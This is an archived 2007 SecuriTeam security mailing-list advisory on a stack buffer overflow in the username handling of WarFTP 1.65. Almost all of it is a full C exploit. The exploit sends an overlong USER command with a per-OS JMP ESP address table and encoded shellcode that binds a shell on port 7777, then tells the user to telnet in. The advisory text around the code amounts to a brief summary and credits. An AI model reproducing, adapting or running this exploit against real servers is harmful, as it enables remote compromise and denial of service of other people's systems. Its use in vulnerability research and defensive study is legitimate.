The OpenNET Project
 
Search (keywords):  SOFT ARTICLES TIPS & TRICKS SECURITY
LINKS NEWS MAN DOCUMENTATION


[EXPL] WarFTP Stack Based Buffer Overflow (Username)


<< Previous INDEX Search src / Print Next >>
From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 26 Mar 2007 13:43:39 +0200
Subject: [EXPL] WarFTP Stack Based Buffer Overflow (Username)
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20070326154613.359385A41@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -




  WarFTP Stack Based Buffer Overflow (Username)
------------------------------------------------------------------------


SUMMARY

WarFTP is prone to a stack-based buffer-overflow vulnerability because it 
fails to properly check boundaries on user-supplied data before copying it 
to an insufficiently sized buffer.

DETAILS

Vulnerable Systems:
 * WarFTP version 1.65

Exploit:
#include <stdio.h>
#include <string.h>
#include <winsock.h>

#define VULNSERVER         "WAR-FTPD 1.65"
#define VULNCMD     "\x55\x53\x45\x52\x20"
#define ZERO                        '\x00'
#define NOP                         '\x90'
#define VULNBUFF                      485
#define BUFFREAD                      128
#define PORT                           21
#define LENJMPESP                       4

/* #######################
   #####                                                                   
#####
   #####                      WARFTP - VERSION 1.65                        
#####
   #####                                                                   
#####
   #####     WarFTP Username Stack-Based Buffer-Overflow Vulnerability     
#####
   #####                                                                   
#####
   #####  DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow    
#####
   #####     vulnerability because it fails to properly check boundaries   
#####
   #####     on user-supplied data before copying it to an insufficiently  
#####
   #####     sized buffer.                                                 
#####
   #####                                                                   
#####
   #####  FUNC VULNERABLE: sprintf(char *buffer, const char *format, argv) 
#####
   #####       0x004044E7: sprintf(0x00ACFB50, "%sCRLF", ExploitBuffer)    
#####
   #####                                                                   
#####
   #####  AFFECTED VERSION: 1.65                                           
#####
   #####  USE: warftphack.exe IP_ADDRESS SO_&_SERVICE_PACK [ ESP ADDRESS ] 
#####
   #####     SO_&_SERVICE_PACK:                                            
#####
   #####        [0]  Microsoft Windows XP Pro Spanish SP0                  
#####
   #####        [1]  Microsoft Windows XP Pro Spanish SP1                  
#####
   #####        [2]  Microsoft Windows XP Pro Spanish SP2                  
#####
   #####        [3]  Microsoft Windows XP Pro English SP0                  
#####
   #####        [4]  Microsoft Windows XP Pro English SP1                  
#####
   #####        [5]  Microsoft Windows XP Pro English SP2                  
#####
   #####        [6]  Microsoft Windows 2000 Pro Spanish SP0                
#####
   #####        [7]  Microsoft Windows 2000 Pro Spanish SP1                
#####
   #####        [8]  Microsoft Windows 2000 Pro Spanish SP2                
#####
   #####        [9]  Microsoft Windows 2000 Pro Spanish SP3                
#####
   #####        [10] Microsoft Windows 2000 Pro English SP0                
#####
   #####        [11] Microsoft Windows 2000 Pro English SP1                
#####
   #####        [12] Microsoft Windows 2000 Pro English SP2                
#####
   #####        [13] Microsoft Windows 2000 Pro English SP3                
#####
   #####        [14] Custom -> JMP ESP ADDRESS                             
#####
   #####                                                                   
#####
   #####     EXAMPLE:  warftphack.exe 127.0.0.1 2                          
#####
   #####     EXAMPLE2: warftphack.exe 127.0.0.1 14 0x776EDDFF              
#####
   #####                                                                   
#####
   #####  AUTOR: niXel - SYSCODE   (SPAIN)                                 
#####
   #####  IDE: Dev-C ver-4.9.9.2                                           
#####
   #####  COMPILER: MinGW                                                  
#####
   #####  DEPENDENCES: Linker -> libwsock32.a                              
#####
   #####  MAIL: [email protected]                                
#####
   #####                                                                   
#####
   ############

      CAUTION: USER command vulnerable => no send \x40 (@) char into 
shellcode (user@host)
                                          no send \x0A (\n) char into 
shellcode
                                          no send \x0D (\r) char into 
shellcode
               FUNCTION sprintf => no send \x00 (\0) char into shellcode

      ############################ BINDSHELLCODE 
##############################
                                       [7777]                              
      */
                                       
char syscode[] =
   "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
   "\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x61"
   "\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x41\x42\x41\x32"
   "\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x39\x4b\x4c\x32"
   "\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x6f\x39\x6f\x35"
   "\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x65\x47\x4c\x6e"
   "\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x4b\x70\x4f\x65"
   "\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x59\x4c\x4b\x46"
   "\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x69\x4e\x4c\x4b"
   "\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x6d\x43\x31\x48"
   "\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x38\x42\x55\x4b"
   "\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x66\x4e\x6b\x46"
   "\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x4b\x65\x53\x34"
   "\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x31\x4b\x73\x74"
   "\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x4b\x67\x30\x46"
   "\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x30\x44\x48\x71"
   "\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x50\x4b\x4f\x4e"
   "\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x32\x53\x58\x30"
   "\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x50\x73\x58\x58"
   "\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x76\x71\x4f\x6d"
   "\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x32\x42\x75\x51"
   "\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x49\x4b\x45\x6e"
   "\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x73\x76\x33\x51"
   "\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x70\x75\x36\x41"
   "\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x71\x6c\x55\x70"
   "\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x6f\x38\x56\x70"
   "\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x38\x6c\x64\x4c"
   "\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x53\x30\x55\x69"
   "\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x39\x36\x37\x69"
   "\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x4f\x5a\x70\x4f"
   "\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x77\x4b\x4f\x4b"
   "\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x44\x30\x66\x41"
   "\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x70\x70\x59\x74"
   "\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x39\x68\x62\x30"
   "\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x6d\x49\x6e\x62"
   "\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x4b\x4c\x6b\x4e"
   "\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x4f\x30\x75\x63"
   "\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x41\x31\x41\x46"
   "\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x71\x39\x6f\x48"
   "\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x53\x39\x6f\x6b"
   "\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x50\x4e\x6b\x50"
   "\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x76\x41\x42\x49"
   "\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x70\x42\x73\x49"
   "\x6f\x58\x56\x49\x6f\x78\x50\x61";
      
int main(int argc, char ** argv) {
   char buffRead[BUFFREAD], jmpESP[LENJMPESP], ch, ch2;
   char * pbuffSend;
   unsigned int err = 0, i, k;
   int sockData, j;
   struct sockaddr_in their_addr;
   WSADATA wsaData;

   system("cls");
   fprintf(stdout, "\n\tWarFTP Username Stack-Based Buffer-Overflow 
Vulnerability\n");
   fprintf(stdout, "     
____________________________________________________________________\n\n");
      
   if (((argc == 3) && (atoi(argv[2]) >= 0) && (atoi(argv[2]) < 14)) || 
((argc == 4) && (atoi(argv[2]) == 14))) {
   
      if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {
         if ((sockData = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
                       
                                            /* Server data struct */

            their_addr.sin_family = AF_INET;                      // ; 
Family AF_INET
            their_addr.sin_addr.s_addr = inet_addr(argv[1]);      // ; IP 
Address = Argv[1]
            their_addr.sin_port = htons(PORT);                    // ; 
Port = 21
            memset(&(their_addr.sin_zero), '0', 8);               // ; 
IP:Port = Argv[1]:21
      
            if (connect(sockData, (struct sockaddr *) &their_addr, 
sizeof(struct sockaddr)) != -1) {
               recv(sockData, buffRead, BUFFREAD, 0);
               buffRead[BUFFREAD - 1] = ZERO;
               
               if (strstr(buffRead, VULNSERVER) != NULL) {
                                    
                  /* ###################################
                     ##### BufferSend -> "USER A*VULNBUFF @JMP_ESP 
\x90\x90\x90\x90 SYSCODE \r\n #####
                     ###################################### */
                     
                  pbuffSend = (char *) malloc(strlen(VULNCMD) + VULNBUFF + 
LENJMPESP + (sizeof(char) * 4) + strlen(syscode) + (sizeof(char) * 2));
                  if (pbuffSend != NULL) {
                     for (i=0; i < strlen(VULNCMD); i++) *(pbuffSend + i) 
= VULNCMD[i];
                     for (j=0; j < VULNBUFF; i++, j++) *(pbuffSend + i) = 
'\x41';
                      
                     /*                      - OPcodes from ntdll.dll -> 
JMP ESP -                     */
                     switch(atoi(argv[2])) {
                        case 0: memcpy(jmpESP, "\xE3\x39\xF4\x77", 
LENJMPESP); break;
                        case 1: memcpy(jmpESP, "\x0F\x98\xF8\x77", 
LENJMPESP); break;
                        case 2: memcpy(jmpESP, "\xED\x1E\x95\x7C", 
LENJMPESP); break;
                        case 3: memcpy(jmpESP, "\xE3\x39\xF4\x77", 
LENJMPESP); break;
                        case 4: memcpy(jmpESP, "\xCC\x59\xFA\x77", 
LENJMPESP); break;
                        case 5: memcpy(jmpESP, "\xED\x1E\x95\x7C", 
LENJMPESP); break;
                        case 6: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 7: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 8: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 9: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 10: memcpy(jmpESP, "\x8B\x94\xF8\x77", 
LENJMPESP); break;
                        case 11: memcpy(jmpESP, "\xAB\x67\xF9\x77", 
LENJMPESP); break;
                        case 12: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 13: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", 
LENJMPESP); break;
                        case 14:
                           k = 0;
                           if ((strncmp(argv[3], "0x", (sizeof(char) * 2)) 
== 0) && (strlen(argv[3]) == 10)) {
                              for (j=(sizeof(char) * 8) - 1; ((j >= 0) && 
(!err)); j--) {
                                 ch = *(argv[3] + j + 2);
                                 if (((ch > 47) && (ch < 58)) || ((ch > 
64) && (ch < 71)) || ((ch > 96) && (ch < 103))) {
                                    if ((ch > 47) && (ch < 58)) ch -= 48;
                                    else if ((ch > 64) && (ch < 71)) ch -= 
55;
                                    else ch -= 87;
                                    
                                    if ((j % 2) == 0) jmpESP[k++] = ((ch 
<<= 4) | ch2);
                                    else ch2 = ch;
                                 }
                                 else { fprintf(stderr, "\t[ ERROR ] Three 
parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
                              }
                           }
                           else { fprintf(stderr, "\t[ ERROR ] Three 
parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
                     }
                     
                     if (!err) {
                        for (j=0; j < LENJMPESP; i++, j++) *(pbuffSend + 
i) = jmpESP[j];
                        for (j=0; j < (sizeof(char) * 4); i++, j++) 
*(pbuffSend + i) = NOP;
                        for (j=0; j < strlen(syscode); i++, j++) 
*(pbuffSend + i) = syscode[j];
                        memcpy(pbuffSend + i, "\r\n", (sizeof(char) * 2));
                     
                        if (i == send(sockData, pbuffSend, ++i, 0)) {
                          fprintf(stdout, "\t[ OK ] Exploit buffer send to 
%s:%d\n", argv[1], PORT);
                          fprintf(stdout, "\t[ OK ] If you have not chosen 
a correct operating system and\n\t       service pack you can cause a 
D.O.S\n");
                          fprintf(stdout, "\t[ OK ] Connect: telnet %s 
7777\n", argv[1]);
                        }
                        else fprintf(stderr, "\t[ ERROR ] No sending all 
exploit buffer\n");
                     }
                     free(pbuffSend);
                  }
                  else fprintf(stderr, "\t[ ERROR ] No allocate 
memory\n");
               }
               else fprintf(stderr, "\t[ ERROR ] Not a vulnerable 
server\n");
            }
            else fprintf(stderr, "\t[ ERROR ] Connect to %s:%d\n", 
argv[1], PORT);
            closesocket(sockData);
         }
         else fprintf(stderr, "\t[ ERROR ] Create local socket\n");
         WSACleanup();
      }
      else fprintf(stderr, "\t[ ERROR ] Load library");
   }
   else {
      fprintf(stderr, "   [ + ] USE: %s IP_ADDRESS SERVICE_PACK [ 
ESP_ADDRESS ]\n\n", argv[0]);
      fprintf(stderr, "   [ + ] SERVICE PACK:  [ - ] Microsoft Windows XP 
Pro Spanish SP0 (0)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP1 
(1)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP2 
(2)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP0 
(3)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP1 
(4)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP2 
(5)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP0 
(6)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP1 
(7)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP2 
(8)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP3 
(9)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP0 
(10)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP1 
(11)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP2 
(12)\n");
      fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP3 
(13)\n");
      fprintf(stderr, "\t\t\t[ - ] Custom Service Pack - JMP %%ESP 
(14)\n\n");
      fprintf(stderr, "   [ + ] EXAMPLE:  %s 127.0.0.1 2\n", argv[0]);
      fprintf(stderr, "   [ + ] EXAMPLE2: %s 127.0.0.1 14 0x776EDDFF\n", 
argv[0]);
   }
   fprintf(stdout, "     
___________________________________________________________________\n\n");
   return 0;
}


ADDITIONAL INFORMATION

The information has been provided by milw0rm.
The original article can be found at:
 <http://www.milw0rm.com/exploits/3570>; 
http://www.milw0rm.com/exploits/3570




This bulletin is sent to members of the SecuriTeam mailing list. To unsubscribe from the list, send mail with an empty subject line and body to: [email protected] In order to subscribe to the mailing list, simply forward this email to: [email protected]

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

<< Previous INDEX Search src / Print Next >>



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2025 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру